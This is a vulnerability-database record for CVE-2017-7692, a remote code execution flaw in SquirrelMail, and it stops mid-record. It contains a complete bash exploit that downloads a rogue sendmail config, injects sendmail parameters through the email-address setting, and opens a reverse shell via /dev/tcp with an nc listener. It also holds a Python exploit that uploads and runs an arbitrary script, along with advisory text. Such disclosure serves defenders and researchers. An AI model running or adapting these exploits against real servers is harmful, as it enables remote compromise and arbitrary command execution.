{"id": "EDB-ID:41910", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SquirrelMail < 1.4.22 - Remote Code Execution", "description": "SquirrelMail < 1.4.22 - Remote Code Execution. CVE-2017-7692. Remote exploit for Linux platform", "published": "2017-04-23T00:00:00", "modified": "2017-04-23T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.0}, "href": "https://www.exploit-db.com/exploits/41910/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-7692"], "lastseen": "2017-04-25T08:47:10", "viewCount": 146, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2017-04-25T08:47:10", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-7692"]}, {"type": "seebug", "idList": ["SSV:93005"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310890941", "OPENVAS:1361412562310872735", "OPENVAS:1361412562310703852", "OPENVAS:1361412562310872733", "OPENVAS:1361412562310106785", "OPENVAS:703852"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142212", "PACKETSTORM:142266"]}, {"type": "debian", "idList": ["DEBIAN:DLA-941-1:C74C1", "DEBIAN:DSA-3852-1:F4146"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5A207B9957580AC118ED163D0FEC5A56"]}, {"type": "nessus", "idList": ["FEDORA_2017-0B6DA97AA5.NASL", "FREEBSD_PKG_E1DE77E8C45E48D788665A6F943046DE.NASL", "DEBIAN_DSA-3852.NASL", "DEBIAN_DLA-941.NASL", "FEDORA_2017-A7161EB173.NASL", "FEDORA_2017-F85C37AE3D.NASL", "GENTOO_GLSA-201709-13.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27626"]}, {"type": "fedora", "idList": ["FEDORA:20BC26069BE6", "FEDORA:4913A60478E1", "FEDORA:70FB5602F586"]}, {"type": "gentoo", "idList": ["GLSA-201709-13"]}, {"type": "threatpost", "idList": ["THREATPOST:0F388C5119C618F2D1F264ECDB1BD186"]}], "modified": "2017-04-25T08:47:10", "rev": 2}, "vulnersScore": 6.3}, "sourceHref": "https://www.exploit-db.com/download/41910/", "sourceData": "#!/bin/bash\r\n#\r\nint='\\033[94m\r\n __ __ __ __ __ \r\n / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________\r\n / / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/\r\n / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \r\n /_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \r\n /____/ \r\n\r\nSquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)\r\n\r\nSquirrelMail_RCE_exploit.sh (ver. 1.0)\r\n\r\nDiscovered and coded by \r\n\r\nDawid Golunski (@dawid_golunski)\r\nhttps://legalhackers.com\r\n\r\nExploitBox project:\r\nhttps://ExploitBox.io\r\n\r\n\\033[0m'\r\n\r\n# Quick and messy PoC for SquirrelMail webmail application.\r\n# It contains payloads for 2 vectors:\r\n# * File Write\r\n# * RCE \r\n# It requires user credentials and that SquirrelMail uses \r\n# Sendmail method as email delivery transport\r\n#\r\n#\r\n# Full advisory URL:\r\n# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html\r\n# Exploit URL:\r\n# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh\r\n#\r\n# Tested on: # Ubuntu 16.04 \r\n# squirrelmail package version:\r\n# 2:1.4.23~svn20120406-2ubuntu1.16.04.1 \r\n#\r\n# Disclaimer:\r\n# For testing purposes only\r\n#\r\n#\r\n# -----------------------------------------------------------------\r\n#\r\n# Interested in vulns/exploitation? \r\n# Stay tuned for my new project - ExploitBox\r\n# \r\n# .;lc' \r\n# .,cdkkOOOko;. \r\n# .,lxxkkkkOOOO000Ol' \r\n# .':oxxxxxkkkkOOOO0000KK0x:' \r\n# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. \r\n# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. \r\n# '';ldxxxxxdc,. ,oOXXXNNNXd;,. \r\n# .ddc;,,:c;. ,c: .cxxc:;:ox: \r\n# .dxxxxo, ., ,kMMM0:. ., .lxxxxx: \r\n# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: \r\n# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: \r\n# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: \r\n# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: \r\n# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: \r\n# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: \r\n# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: \r\n# .dxxxxxdl;. ., .. .;cdxxxxxx: \r\n# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: \r\n# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. \r\n# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. \r\n# .':oxxxxxxxxx.ckkkkkkkkxl,. \r\n# .,cdxxxxx.ckkkkkxc. \r\n# .':odx.ckxl,. \r\n# .,.'. \r\n#\r\n# https://ExploitBox.io\r\n#\r\n# https://twitter.com/Exploit_Box\r\n#\r\n# -----------------------------------------------------------------\r\n\r\nsqspool=\"/var/spool/squirrelmail/attach/\"\r\n\r\necho -e \"$int\"\r\n#echo -e \"\\033[94m \\nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \\n\"\r\n#echo -e \"SquirrelMail_RCE_exploit.sh (ver. 1.0)\\n\"\r\n#echo -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttps://legalhackers.com \\033[0m\\n\\n\"\r\n\r\n\r\n# Base URL\r\nif [ $# -ne 1 ]; then\r\n\techo -e \"Usage: \\n$0 SquirrelMail_URL\"\r\n\techo -e \"Example: \\n$0 http://target/squirrelmail/ \\n\"\r\n\t\r\n\texit 2\r\nfi\r\nURL=\"$1\"\r\n\r\n# Log in\r\necho -e \"\\n[*] Enter SquirrelMail user credentials\"\r\nread -p \"user: \" squser\r\nread -sp \"pass: \" sqpass\r\n\r\necho -e \"\\n\\n[*] Logging in to SquirrelMail at $URL\"\r\ncurl -s -D /tmp/sqdata -d\"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1\" $URL/src/redirect.php | grep -q incorrect\r\nif [ $? -eq 0 ]; then\r\n\techo \"Invalid creds\"\r\n\texit 2\r\nfi\r\nsessid=\"`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\"\r\nkeyid=\"`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\"\r\n\r\n\r\n# Prepare Sendmail cnf\r\n#\r\n# * The config will launch php via the following stanza:\r\n# \r\n# Mlocal,\tP=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n# \t\tT=DNS/RFC822/X-Unix,\r\n# \t\tA=php -- $u $h ${client_addr}\r\n#\r\nwget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf\r\n\r\n# Upload config\r\necho -e \"\\n\\n[*] Uploading Sendmail config\"\r\ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/compose.php?mailbox=INBOX&startMessage=1\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\"\r\nattachid=\"`curl -H \"Expect:\" -s -b\"SQMSESSID=$sessid; key=$keyid\" -F\"smtoken=$token\" -F\"send_to=$mail\" -F\"subject=attach\" -F\"body=test\" -F\"attachfile=@/tmp/smcnf-exp\" -F\"username=$squser\" -F\"attach=Add\" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'\"' '{print $2}' | tr -d '\\n'`\"\r\nif [ ${#attachid} -lt 32 ]; then\r\n\techo \"Something went wrong. Failed to upload the sendmail file.\"\r\n\texit 2\r\nfi\r\n\r\n# Create Sendmail cmd string according to selected payload\r\necho -e \"\\n\\n[?] Select payload\\n\"\r\n# SELECT PAYLOAD\r\necho \"1 - File write (into /tmp/sqpoc)\"\r\necho \"2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)\"\r\necho\r\nread -p \"[1-2] \" pchoice\r\n\r\ncase $pchoice in\r\n\t1) payload=\"$squser@localhost\t-oQ/tmp/\t-X/tmp/sqpoc\" \r\n\t ;;\r\n\r\n\t2) payload=\"$squser@localhost\t-oQ/tmp/\t-C$sqspool/$attachid\" \r\n\t ;;\r\nesac\r\n\r\nif [ $pchoice -eq 2 ]; then\r\n\techo\r\n\tread -p \"Reverese shell IP: \" reverse_ip\r\n\tread -p \"Reverese shell PORT: \" reverse_port\r\nfi\r\n\r\n# Reverse shell code\r\nphprevsh=\"\r\n<?php \r\n\t\\$cmd = \\\"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\\\";\r\n\tfile_put_contents(\\\"/tmp/cmd\\\", 'export PATH=\\\"\\$PATH\\\" ; export TERM=vt100 ;' . \\$cmd);\r\n\tsystem(\\\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\\\");\r\n?>\"\r\n\r\n\r\n# Set sendmail params in user settings\r\necho -e \"\\n[*] Injecting Sendmail command parameters\"\r\ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/options.php?optpage=personal\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\"\r\ncurl -s -b\"SQMSESSID=$sessid; key=$keyid\" -d \"smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit\" --data-urlencode \"new_email_address=$payload\" \"$URL/src/options.php?optpage=personal\" | grep -q 'Success' 2>/dev/null\r\nif [ $? -ne 0 ]; then\r\n\techo \"Failed to inject sendmail parameters\"\r\n\texit 2\r\nfi\r\n\r\n# Send email which triggers the RCE vuln and runs phprevsh\r\necho -e \"\\n[*] Sending the email to trigger the vuln\"\r\n(sleep 2s && curl -s -D/tmp/sheaders -b\"SQMSESSID=$sessid; key=$keyid\" -d\"smtoken=$token\" -d\"startMessage=1\" -d\"session=0\" \\\r\n-d\"send_to=$squser@localhost\" -d\"subject=poc\" --data-urlencode \"body=$phprevsh\" -d\"send=Send\" -d\"username=$squser\" $URL/src/compose.php) &\r\n\r\nif [ $pchoice -eq 2 ]; then\r\n\techo -e \"\\n[*] Waiting for shell on $reverse_ip port $reverse_port\"\r\n\tnc -vv -l -p $reverse_port\r\nelse\r\n\techo -e \"\\n[*] The test file should have been written at /tmp/sqpoc\"\r\nfi\r\n\r\ngrep -q \"302 Found\" /tmp/sheaders\r\nif [ $? -eq 1 ]; then\r\n\techo \"There was a problem with sending email\"\r\n\texit 2\r\nfi\r\n\r\n\r\n# Done\r\necho -e \"\\n[*] All done. Exiting\"\r\n\r\n", "osvdbidlist": []}

{"cve": [{"lastseen": "2020-10-03T13:07:49", "description": "SquirrelMail 1.4.22 (and other versions before 20170427_0200-SVN) allows post-authentication remote code execution via a sendmail.cf file that is mishandled in a popen call. It's possible to exploit this vulnerability to execute arbitrary shell commands on the remote server. The problem is in the Deliver_SendMail.class.php with the initStream function that uses escapeshellcmd() to sanitize the sendmail command before executing it. The use of escapeshellcmd() is not correct in this case since it doesn't escape whitespaces, allowing the injection of arbitrary command parameters. The problem is in -f$envelopefrom within the sendmail command line. Hence, if the target server uses sendmail and SquirrelMail is configured to use it as a command-line program, it's possible to trick sendmail into using an attacker-provided configuration file that triggers the execution of an arbitrary command. For exploitation, the attacker must upload a sendmail.cf file as an email attachment, and inject the sendmail.cf filename with the -C option within the \"Options > Personal Informations > Email Address\" setting.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-20T14:59:00", "title": "CVE-2017-7692", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7692"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:squirrelmail:squirrelmail:1.4.22"], "id": "CVE-2017-7692", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7692", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:squirrelmail:squirrelmail:1.4.22:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T11:59:38", "description": "Squirrelmail version 1.4.22 (and probably prior) is vulnerable to a remote code execution vulnerability because\r\nit fails to sanitize a string before passing it to a popen call. It's possible to exploit this vulnerability to \r\nexecute arbitrary shell commands on the remote server.\r\n\r\nThe problem is in Deliver_SendMail.class.php on initStream function that uses escapeshellcmd() to sanitize the \r\nsendmail command before executing it. The use of escapeshellcmd() is not correct in this case since it don't \r\nescapes whitespaces allowing the injection of arbitrary command parameters.\r\n\r\n $this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \r\n $stream = popen(escapeshellcmd($this->sendmail_command), \"w\");\r\n\r\n\r\nThe $envelopefrom variable is controlled by the attacker, hence it's possible to trick sendmail to use an \r\nattacker-provided configuration file that triggers the execution of an arbitrary command.\r\n\r\nIn order to exploit this vulnerability the MTA in use must be sendmail and Squirrelmail must be configured\r\nto use it as commandline (useSendmail directive of the config file set to true).\r\nAlso, the edit_identity directive of the config file must be bet to true, but this is the default configuration.\r\n\r\nTo reproduce the issue follow these steps:\r\n\r\n```\r\n 1. Create a rogue sendmail.cf that triggers the execution of a /usr/bin/touch:\r\n [...]\r\n Mlocal, P=/usr/bin/touch, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n T=DNS/RFC822/X-Unix,\r\n A=X /tmp/executed\r\n 2. Upload it as a mail attachment and get it's remote name (ex: lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD)\r\n 3. Go to Options -> Personal Informations and set the following payload as Email Address:\r\n <aaa () abc com -OQueueDirectory=/tmp -C \r\n/var/local/squirrelmail/attach/lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD>\r\n 4. Send an email\r\n 5. Verify the execution of the command with \"ls /tmp/executed\" on the remote server\r\n\r\n```", "published": "2017-04-22T00:00:00", "type": "seebug", "title": "Squirrelmail 1.4.22 Remote Code Execution (CVE-2017-7692)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7692"], "modified": "2017-04-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93005", "id": "SSV:93005", "sourceData": "\n The followig python script exploits this vulnerability to execute an attacker provided bash script on the remote server.\r\n\r\nBOF\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n\r\n\"\"\"\r\n\r\nSquirrelMail 1.4.22 Remote Code Execution (authenticated) \r\nExploit code for CVE-2017-7692\r\nfilippo.cavallarin () wearesegment com\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import unicode_literals\r\nimport sys\r\nimport os\r\nimport re\r\nimport requests\r\n\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\n\r\n\r\nSENDMAILCF=\"/tmp/squirrelmail1_4_22-sendmailcf-rce\"\r\nCOMPOSE = \"/src/compose.php\"\r\nINFOS = \"/src/options.php?optpage=personal\"\r\nSQM_ATTACH_PATH = \"/var/local/squirrelmail/attach/\"\r\n# must be enclosed in <> otherwise spaces will be removed ..\r\nSENDER = \"<px () xxxx com -OQueueDirectory=/tmp -C %s%s>\"\r\n\r\n\r\nSESSID = \"\"\r\nBASEURL = \"\"\r\n\r\n\r\ndef attach(attachment):\r\n url = \"%s%s\" % (BASEURL, COMPOSE)\r\n token = get_csrf_token(url)\r\n\r\n values = {\r\n \"smtoken\": token,\r\n \"attach\": \"add\"\r\n }\r\n\r\n try:\r\n files = {'attachfile': open(attachment,'rb')}\r\n resp = requests.post(url, files=files, data=values, cookies={'SQMSESSID':SESSID})\r\n fname = re.search(r'att_local_name&quot;;s:[0-9]+:&quot;([a-zA-Z0-9]+)&quot;', resp.text)\r\n if not fname:\r\n print \"\\nError: unable to upload file %s\" % attachment\r\n return fname.group(1)\r\n\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef send():\r\n url = \"%s%s\" % (BASEURL, COMPOSE)\r\n token = get_csrf_token(url)\r\n\r\n values = {\r\n \"smtoken\": token,\r\n \"send_to\": \"root\",\r\n \"send\": \"Send\"\r\n }\r\n\r\n try:\r\n resp = requests.post(url, data=values, cookies={'SQMSESSID':SESSID})\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef set_identity(sender):\r\n url = \"%s%s\" % (BASEURL, INFOS)\r\n token = get_csrf_token(url)\r\n values = {\r\n \"smtoken\": token,\r\n \"optpage\": \"personal\",\r\n \"optmode\": \"submit\",\r\n \"new_email_address\": sender,\r\n \"submit_personal\": \"Submit\"\r\n }\r\n\r\n try:\r\n requests.post(url, data=values, cookies={'SQMSESSID':SESSID})\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef get_csrf_token(url):\r\n try:\r\n body = requests.get(url, cookies={'SQMSESSID':SESSID}).text\r\n inp = re.search(r'<input.*name=\"smtoken\".*>', body, re.MULTILINE)\r\n token = re.search(r'value=\"([a-zA-Z0-9]+)\"', inp.group(0))\r\n if token:\r\n return token.group(1)\r\n except Exception as e:\r\n pass\r\n\r\n print \"\\nUnable to get CSRF token\"\r\n sys.exit(1)\r\n\r\ndef outw(s):\r\n sys.stdout.write(s)\r\n sys.stdout.flush()\r\n\r\ndef main(argv):\r\n global BASEURL\r\n global SESSID\r\n\r\n if len(argv) != 4:\r\n print (\r\n \"SquirrelMail 1.4.22 Remote Code Execution (authenticated) - filippo.cavallarin () wearesegment com\\n\"\r\n \"The target server must use sendmail and squirrelmail must be configured to use /usr/bin/sendmail\\n\"\r\n \"Usage:\\n\"\r\n \" %s <url> <session_id> <script>\\n\"\r\n \" url: the url of squirrelmail\\n\"\r\n \" session_id: the value of SQMSESSID cookie\\n\"\r\n \" script: the path to the bash script to be executed on the target\\n\"\r\n \"Example:\\n\"\r\n \" %s http:/example.com/squirrelmail/ l2rapvcovsui1on0b4i5boev24 reverseshell.sh\"\r\n ) % (argv[0], argv[0])\r\n\r\n sys.exit(1)\r\n\r\n BASEURL = argv[1]\r\n SESSID = argv[2]\r\n script = argv[3]\r\n\r\n outw(\"Uploading script ... \")\r\n script_fname = attach(script)\r\n print \"ok\"\r\n\r\n\r\n outw(\"Generating sendmail.cf ... \")\r\n try:\r\n script_path = \"%s%s\" % (SQM_ATTACH_PATH, script_fname)\r\n with open(SENDMAILCF, 'w') as f:\r\n f.write(SENDMAILCF_CONTENT % script_path)\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n print \"ok\"\r\n\r\n outw(\"Uploading sendmail.cf ... \")\r\n smc_fname = attach(SENDMAILCF)\r\n os.remove(SENDMAILCF)\r\n print \"ok\"\r\n\r\n outw(\"Updating user options ... \")\r\n sender = SENDER % (SQM_ATTACH_PATH, smc_fname)\r\n set_identity(sender)\r\n print \"ok\"\r\n\r\n outw(\"Checking identity field ... \")\r\n icheck = requests.get(\"%s%s\" % (BASEURL, INFOS), cookies={'SQMSESSID':SESSID}).text\r\n if not smc_fname in icheck:\r\n print \"\\nError: unable to set identity field .. maybe squirrelmail is configured with edit_identity=false\"\r\n sys.exit(1)\r\n print \"ok\"\r\n\r\n outw(\"Executing script ... \")\r\n send()\r\n print \"ok\\n\"\r\n sys.exit(0)\r\n\r\nSENDMAILCF_CONTENT = \"\"\"\r\nO \r\nDontBlameSendmail=,AssumeSafeChown,ForwardFileInGroupWritableDirPath,GroupWritableForwardFileSafe,GroupWritableIncludeFileSafe,IncludeFileInGroupWritableDirPath,DontWarnForwardFileInUnsafeDirPath,TrustStickyBit,NonRootSafeAddr,GroupWritableIncludeFile,GroupReadableDefaultAuthInfoFile\r\nKdequote dequote\r\nScanonify=3\r\nR$@ $@ <@>\r\nR$* $: $1 <@> mark addresses\r\nR$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>\r\nR@ $* <@> $: @ $1 unmark @host:...\r\nR$* [ IPv6 : $+ ] <@> $: $1 [ IPv6 : $2 ] unmark IPv6 addr\r\nR$* :: $* <@> $: $1 :: $2 unmark node::addr\r\nR:include: $* <@> $: :include: $1 unmark :include:...\r\nR$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon\r\nR$* : $* <@> $: $2 strip colon if marked\r\nR$* <@> $: $1 unmark\r\nR$* ; $1 strip trailing semi\r\nR$* < $+ :; > $* $@ $2 :; <@> catch <list:;>\r\nR$* < $* ; > $1 < $2 > bogus bracketed semi\r\nR$@ $@ :; <@>\r\nR$* $: < $1 > housekeeping <>\r\nR$+ < $* > < $2 > strip excess on left\r\nR< $* > $+ < $1 > strip excess on right\r\nR<> $@ < @ > MAIL FROM:<> case\r\nR< $+ > $: $1 remove housekeeping <>\r\nR@ $+ , $+ $2\r\nR@ [ $* ] : $+ $2\r\nR@ $+ : $+ $2\r\nR $+ : $* ; @ $+ $@ $>Canonify2 $1 : $2 ; < @ $3 > list syntax\r\nR $+ : $* ; $@ $1 : $2; list syntax\r\nR$+ @ $+ $: $1 < @ $2 > focus on domain\r\nR$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right\r\nR$+ < @ $+ > $@ $>Canonify2 $1 < @ $2 > already canonical\r\nR$- ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > resolve uucp names\r\nR$+ . $- ! $+ $@ $>Canonify2 $3 < @ $1 . $2 > domain uucps\r\nR$+ ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > uucp subdomains\r\nR$* %% $* $1 @ $2 First make them all @s.\r\nR$* @ $* @ $* $1 %% $2 @ $3 Undo all but the last.\r\nR$* @ $* $@ $>Canonify2 $1 < @ $2 > Insert < > and finish\r\nR$* $@ $>Canonify2 $1\r\nSCanonify2=96\r\nR$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all\r\nR$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain\r\nR$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain\r\nR$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [addr]\r\nR$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal\r\nR$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr\r\nSfinal=4\r\nR$+ :; <@> $@ $1 : handle <list:;>\r\nR$* <@> $@ handle <> and list:;\r\nR$* < @ $+ . > $* $1 < @ $2 > $3\r\nR$* < @ *LOCAL* > $* $1 < @ $j > $2\r\nR$* < $+ > $* $1 $2 $3 defocus\r\nR@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical\r\nR@ $* $@ @ $1 ... and exit\r\nR$+ @ $- . UUCP $2!$1 u () h UUCP => h!u\r\nR$+ %% $=w @ $=w $1 @ $2 u%%host@host => u@host\r\nSRecurse=97\r\nR$* $: $>canonify $1\r\nR$* $@ $>parse $1\r\nSparse=0\r\nR$* $: $>Parse0 $1 initial parsing\r\nR<@> $#local $: <@> special case error msgs\r\nR$* $: $>ParseLocal $1 handle local hacks\r\nR$* $: $>Parse1 $1 final parsing\r\nSParse0\r\nR<@> $@ <@> special case error msgs\r\nR$* : $* ; <@> $#error $@ 5.1.3 $: \"553 List:; syntax illegal for recipient addresses\"\r\nR@ <@ $* > < @ $1 > catch \"@@host\" bogosity\r\nR<@ $+> $#error $@ 5.1.3 $: \"553 User address required\"\r\nR$+ <@> $#error $@ 5.1.3 $: \"553 Hostname required\"\r\nR$* $: <> $1\r\nR<> $* < @ [ $* ] : $+ > $* $1 < @ [ $2 ] : $3 > $4\r\nR<> $* < @ [ $* ] , $+ > $* $1 < @ [ $2 ] , $3 > $4\r\nR<> $* < @ [ $* ] $+ > $* $#error $@ 5.1.2 $: \"553 Invalid address\"\r\nR<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3\r\nR<> $* <$* : $* > $* $#error $@ 5.1.3 $: \"553 Colon illegal in host name part\"\r\nR<> $* $1\r\nR$* < @ . $* > $* $#error $@ 5.1.2 $: \"553 Invalid host name\"\r\nR$* < @ $* .. $* > $* $#error $@ 5.1.2 $: \"553 Invalid host name\"\r\nR$* < @ $* @ > $* $#error $@ 5.1.2 $: \"553 Invalid route address\"\r\nR$* @ $* < @ $* > $* $#error $@ 5.1.3 $: \"553 Invalid route address\"\r\nR$* , $~O $* $#error $@ 5.1.3 $: \"553 Invalid route address\"\r\nR$* < @ > $* $@ $>Parse0 $>canonify $1 user@ => user\r\nR< @ $=w . > : $* $@ $>Parse0 $>canonify $2 @here:... -> ...\r\nR$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote \"foo\"@here\r\nR< @ $+ > $#error $@ 5.1.3 $: \"553 User address required\"\r\nR$* $=O $* < @ $=w . > $@ $>Parse0 $>canonify $1 $2 $3 ...@here -> ...\r\nR$- $: $(dequote $1 $) < @ *LOCAL* > dequote \"foo\"\r\nR< @ *LOCAL* > $#error $@ 5.1.3 $: \"553 User address required\"\r\nR$* $=O $* < @ *LOCAL* >\r\n $@ $>Parse0 $>canonify $1 $2 $3 ...@*LOCAL* -> ...\r\nR$* < @ *LOCAL* > $: $1\r\nSParse1\r\nR$* < @ [ $+ ] > $* $: $>ParseLocal $1 < @ [ $2 ] > $3 numeric internet spec\r\nR$* < @ [ $+ ] > $* $: $1 < @ [ $2 ] : $S > $3 Add smart host to path\r\nR$* < @ [ $+ ] : > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 no smarthost: send\r\nR$* < @ [ $+ ] : $- : $*> $* $#$3 $@ $4 $: $1 < @ [$2] > $5 smarthost with mailer\r\nR$* < @ [ $+ ] : $+ > $* $#esmtp $@ $3 $: $1 < @ [$2] > $4 smarthost without mailer\r\nR$=L < @ $=w . > $#local $: @ $1 special local names\r\nR$+ < @ $=w . > $#local $: $1 regular local name\r\nR$* < @ $* > $* $: $>MailerToTriple < $S > $1 < @ $2 > $3 glue on smarthost name\r\nR$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 user@host.domain\r\nR$=L $#local $: @ $1 special local names\r\nR$+ $#local $: $1 regular local names\r\nSLocal_localaddr\r\nSlocaladdr=5\r\nR$+ $: $1 $| $>\"Local_localaddr\" $1\r\nR$+ $| $#ok $@ $1 no change\r\nR$+ $| $#$* $#$2\r\nR$+ $| $* $: $1\r\nR$+ + * $#local $@ $&h $: $1\r\nR$+ + $* $#local $@ + $2 $: $1 + *\r\nR$+ $: <> $1\r\nR< > $+ $: < > < $1 <> $&h > nope, restore +detail\r\nR< > < $+ <> + $* > $: < > < $1 + $2 > check whether +detail\r\nR< > < $+ <> $* > $: < > < $1 > else discard\r\nR< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part\r\nR< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra +\r\nR< > < $+ > $@ $1 no +detail\r\nR$+ $: $1 <> $&h add +detail back in\r\nR$+ <> + $* $: $1 + $2 check whether +detail\r\nR$+ <> $* $: $1 else discard\r\nR< local : $* > $* $: $>MailerToTriple < local : $1 > $2 no host extension\r\nR< error : $* > $* $: $>MailerToTriple < error : $1 > $2 no host extension\r\nR< $~[ : $+ > $+ $: $>MailerToTriple < $1 : $2 > $3 < @ $2 >\r\nR< $+ > $+ $@ $>MailerToTriple < $1 > $2 < @ $1 >\r\nSParseLocal=98\r\nSEnvFromL\r\nR<@> $n errors to mailer-daemon\r\nR@ <@ $*> $n temporarily bypass Sun bogosity\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqEnv $1 do masquerading\r\nSEnvToL\r\nR$+ < @ $* > $: $1 strip host part\r\nR$+ + $* $: < $&{addr_type} > $1 + $2 mark with addr type\r\nR<e s> $+ + $* $: $1 remove +detail for sender\r\nR< $* > $+ $: $2 else remove mark\r\nSHdrFromL\r\nR<@> $n errors to mailer-daemon\r\nR@ <@ $*> $n temporarily bypass Sun bogosity\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqHdr $1 do masquerading\r\nSHdrToL\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqHdr $1 do all-masquerading\r\nSAddDomain\r\nR$* < @ $* > $* $@ $1 < @ $2 > $3 already fully 